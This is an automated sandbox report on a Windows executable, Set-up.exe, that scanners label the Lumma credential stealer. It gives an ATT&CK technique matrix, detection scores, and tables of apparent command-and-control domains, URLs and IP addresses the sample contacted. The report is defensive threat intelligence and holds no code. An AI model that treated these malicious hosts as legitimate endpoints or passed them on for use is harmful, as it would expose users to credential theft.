      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation
      1
      DLL Side-Loading
      2
      Process Injection
      2
      Virtualization/Sandbox Evasion
      11
      Input Capture
      1
      System Time Discovery
      Remote Services11
      Input Capture
      11
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      PowerShell
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      2
      Process Injection
      LSASS Memory1
      Query Registry
      Remote Desktop Protocol1
      Archive Collected Data
      1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Deobfuscate/Decode Files or Information
      Security Account Manager21
      Security Software Discovery
      SMB/Windows Admin Shares3
      Clipboard Data
      3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
      Obfuscated Files or Information
      NTDS2
      Virtualization/Sandbox Evasion
      Distributed Component Object ModelInput Capture114
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA Secrets3
      Process Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials43
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      Set-up.exe34%ReversingLabsWin32.Spyware.Lummastealer
      Set-up.exe41%VirustotalBrowse
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      condifendteu.sbs0%VirustotalBrowse
      steamcommunity.com0%VirustotalBrowse
      sippymroat.cfd0%VirustotalBrowse
      vennurviot.sbs17%VirustotalBrowse
      drawwyobstacw.sbs0%VirustotalBrowse
      mathcucom.sbs20%VirustotalBrowse
      sergei-esenin.com18%VirustotalBrowse
      ehticsprocw.sbs0%VirustotalBrowse
      resinedyw.sbs0%VirustotalBrowse
      allocatinow.sbs0%VirustotalBrowse
      enlargkiw.sbs0%VirustotalBrowse
      SourceDetectionScannerLabelLink
      https://player.vimeo.com0%URL Reputationsafe
      https://player.vimeo.com0%URL Reputationsafe
      https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
      https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
      https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
      http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
      https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
      https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
      https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
      https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
      https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
      https://steam.tv/0%URL Reputationsafe
      https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
      https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
      http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
      https://store.steampowered.com/points/shop/0%URL Reputationsafe
      https://lv.queniujq.cn0%URL Reputationsafe
      https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
      https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
      https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
      https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
      https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
      https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
      https://checkout.steampowered.com/0%URL Reputationsafe
      https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
      https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
      https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
      https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
      https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
      https://store.steampowered.com/;0%URL Reputationsafe
      https://store.steampowered.com/about/0%URL Reputationsafe
      https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
      https://help.steampowered.com/en/0%URL Reputationsafe
      https://store.steampowered.com/news/0%URL Reputationsafe
      https://community.akamai.steamstatic.com/0%URL Reputationsafe
      http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
      https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
      https://recaptcha.net/recaptcha/;0%URL Reputationsafe
      https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
      https://store.steampowered.com/stats/0%URL Reputationsafe
      https://medal.tv0%URL Reputationsafe
      https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
      https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
      https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
      https://sergei-esenin.com/0%VirustotalBrowse
      https://vennurviot.sbs/18%VirustotalBrowse
      drawwyobstacw.sbs0%VirustotalBrowse
      sippymroat.cfd0%VirustotalBrowse
      https://www.cloudflare.com/learning/access-management/phishing-attack/0%VirustotalBrowse
      enlargkiw.sbs0%VirustotalBrowse
      https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp0%VirustotalBrowse
      allocatinow.sbs0%VirustotalBrowse
      https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse
      https://sippymroat.cfd/api1%VirustotalBrowse
      https://www.youtube.com0%VirustotalBrowse
      mathcucom.sbs20%VirustotalBrowse
      https://www.google.com0%VirustotalBrowse
      https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi0%VirustotalBrowse
      http://www.spaceblue.com0%VirustotalBrowse
      https://sketchfab.com0%VirustotalBrowse
      http://www.activestate.com0%VirustotalBrowse
      https://ehticsprocw.sbs/pi11%VirustotalBrowse
      https://vennurviot.sbs/api18%VirustotalBrowse
      https://enlargkiw.sbs/18%VirustotalBrowse
      https://www.youtube.com/0%VirustotalBrowse
      ehticsprocw.sbs0%VirustotalBrowse
      https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a0%VirustotalBrowse
      https://www.cloudflare.com/5xx-error-landing0%VirustotalBrowse
      https://sergei-esenin.com/r17%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      condifendteu.sbs
      172.67.141.136
      truetrueunknown
      steamcommunity.com
      104.102.49.254
      truetrueunknown
      sippymroat.cfd
      188.114.97.3
      truetrueunknown
      vennurviot.sbs
      172.67.140.193
      truetrueunknown
      drawwyobstacw.sbs
      188.114.96.3
      truetrueunknown
      mathcucom.sbs
      188.114.96.3
      truetrueunknown
      sergei-esenin.com
      104.21.53.8
      truetrueunknown
      ehticsprocw.sbs
      104.21.30.221
      truetrueunknown
      resinedyw.sbs
      104.21.77.78
      truetrueunknown
      enlargkiw.sbs
      172.67.152.13
      truetrueunknown
      allocatinow.sbs
      unknown
      unknowntrueunknown
      NameMaliciousAntivirus DetectionReputation
      enlargkiw.sbstrueunknown
      allocatinow.sbstrueunknown
      sippymroat.cfdtrueunknown
      drawwyobstacw.sbstrueunknown
      https://sippymroat.cfd/apitrueunknown
      mathcucom.sbstrueunknown
      https://steamcommunity.com/profiles/76561199724331900true
      • URL Reputation: malware
      unknown
      https://vennurviot.sbs/apitrueunknown
      ehticsprocw.sbstrueunknown
      condifendteu.sbstrue
        unknown
        https://drawwyobstacw.sbs/apitrue
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://www.cloudflare.com/learning/access-management/phishing-attack/Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1934108862.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          https://player.vimeo.comSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          https://steamcommunity.com/?subsection=broadcastsSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          http://www.activestate.comHolgerSet-up.exefalse
            unknown
            https://sergei-esenin.com/Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2124248780.0000000000D28000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://vennurviot.sbs/Set-up.exe, 00000000.00000003.1891644416.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmptrueunknown
            https://store.steampowered.com/subscriber_agreement/Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://www.gstatic.cn/recaptcha/Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.valvesoftware.com/legal.htmSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://www.youtube.comSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://www.google.comSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.spaceblue.comSet-up.exefalseunknown
            https://steamcommunity.com/a1Set-up.exe, 00000000.00000003.1933909044.0000000000D54000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPiSet-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              https://s.ytimg.com;Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                http://www.develop.comDeepakSet-up.exefalse
                  unknown
                  https://steam.tv/Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://ehticsprocw.sbs/piSet-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.activestate.comSet-up.exefalseunknown
                  http://store.steampowered.com/privacy_agreement/Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://store.steampowered.com/points/shop/Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://enlargkiw.sbs/Set-up.exe, 00000000.00000003.1860446631.0000000000D92000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://sketchfab.comSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://vennurviot.sbs/api/4Set-up.exe, 00000000.00000003.1882257795.0000000000D6B000.00000004.00000020.00020000.00000000.sdmptrue
                    unknown
                    https://lv.queniujq.cnSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/profiles/76561199724331900/inventory/Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    unknown
                    https://www.youtube.com/Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://store.steampowered.com/privacy_agreement/Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.spaceblue.comMathiasSet-up.exefalse
                      unknown
                      https://www.cloudflare.com/5xx-error-landingSet-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933909044.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1934108862.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://sergei-esenin.com/rSet-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://sergei-esenin.com:443/apiSet-up.exe, 00000000.00000002.2124248780.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933909044.0000000000D6B000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&aSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://mathcucom.sbs/Set-up.exe, 00000000.00000003.1849993860.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1849935104.0000000000D91000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://www.lua.orgSet-up.exefalse
                            unknown
                            https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.google.com/recaptcha/Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://checkout.steampowered.com/Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://ehticsprocw.sbs/jSet-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://avatars.akamai.steamstaticSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://ehticsprocw.sbs/Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://store.steampowered.com/;Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://store.steampowered.com/about/Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://steamcommunity.com/my/wishlist/Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.scintilla.org/scite.rngSet-up.exefalse
                                        unknown
                                        https://help.steampowered.com/en/Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://steamcommunity.com/market/Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://store.steampowered.com/news/Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://allocatinow.sbs/apisCSet-up.exe, 00000000.00000003.1849935104.0000000000D91000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://community.akamai.steamstatic.com/Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://allocatinow.sbs/2Set-up.exe, 00000000.00000003.1860446631.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1849935104.0000000000D91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://store.steampowered.com/subscriber_agreement/Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://allocatinow.sbs/apiSet-up.exe, 00000000.00000003.1849935104.0000000000D91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgSet-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://steamcommunity.com/profiles/76561199724331900Q1Set-up.exe, 00000000.00000003.1933909044.0000000000D54000.00000004.00000020.00020000.00000000.sdmptrue
                                                      unknown
                                                      http://www.baanboard.comBrendonSet-up.exefalse
                                                        unknown
                                                        https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://recaptcha.net/recaptcha/;Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.smartsharesystems.com/Set-up.exefalse
                                                          unknown
                                                          http://www.scintilla.orgSet-up.exefalse
                                                            unknown
                                                            https://ehticsprocw.sbs/BSet-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://steamcommunity.com/discussions/Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://store.steampowered.com/stats/Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://medal.tvSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://broadcast.st.dl.eccdnx.comSet-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://store.steampowered.com/steam_refunds/Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.develop.comSet-up.exefalse
                                                                  unknown
                                                                  https://resinedyw.sbs/Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    104.21.53.8
                                                                    sergei-esenin.comUnited States
                                                                    13335CLOUDFLARENETUStrue
                                                                    188.114.97.3
                                                                    sippymroat.cfdEuropean Union
                                                                    13335CLOUDFLARENETUStrue
                                                                    188.114.96.3
                                                                    drawwyobstacw.sbsEuropean Union
                                                                    13335CLOUDFLARENETUStrue
                                                                    172.67.152.13
                                                                    enlargkiw.sbsUnited States
                                                                    13335CLOUDFLARENETUStrue
                                                                    104.21.30.221
                                                                    ehticsprocw.sbsUnited States
                                                                    13335CLOUDFLARENETUStrue
                                                                    172.67.141.136
                                                                    condifendteu.sbsUnited States
                                                                    13335CLOUDFLARENETUStrue
                                                                    104.102.49.254
                                                                    steamcommunity.comUnited States
                                                                    16625AKAMAI-ASUStrue
                                                                    172.67.140.193
                                                                    vennurviot.sbsUnited States
                                                                    13335CLOUDFLARENETUStrue
                                                                    104.21.77.78
                                                                    resinedyw.sbsUnited States
                                                                    13335CLOUDFLARENETUStrue
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1532477
                                                                    Start date and time:2024-10-13 11:41:04 +02:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 6m 8s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:8
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:Set-up.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.evad.winEXE@2/5@11/9
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HCA Information:
                                                                    • Successful, ratio: 71%
                                                                    • Number of executed functions: 6
                                                                    • Number of non-executed functions: 180
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Not all processes where analyzed, report is missing behavior information
